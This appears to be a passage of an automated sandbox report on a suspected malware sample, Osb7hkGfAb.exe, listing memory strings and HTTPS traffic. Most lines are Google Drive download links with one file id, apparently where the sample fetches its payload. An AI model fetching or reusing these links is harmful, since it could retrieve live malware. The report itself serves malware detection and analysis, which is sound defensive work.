      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL43
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4:
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4A
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4B
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4O
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4R
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4_
      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4gCL3LQ3cnIDyIL4
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4n$
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002DD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4s
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4st
      Source: Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4stV$
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4z$
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/xq3
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/Z
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download0
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download8Z
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadGh
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadH
      Source: Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadWo
      Source: Osb7hkGfAb.exe, 00000006.00000003.2340236673.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadY
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloade
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadeh
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadfo
      Source: Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadom
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadoo
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3205372774.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2949977423.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2474031987.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2351203004.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2462841446.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.3083072614.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadt
      Source: Osb7hkGfAb.exe, 00000006.00000002.3330134810.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2717350547.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=downloadxq
      Source: Osb7hkGfAb.exe, 00000006.00000001.2123046241.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000006.00000003.2950032737.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: Osb7hkGfAb.exe, 00000006.00000003.2950032737.0000000002E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2961383407.0000000002E56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.co
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: Osb7hkGfAb.exe, 00000006.00000003.2584549953.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
      Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.10:49988 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49991 version: TLS 1.2
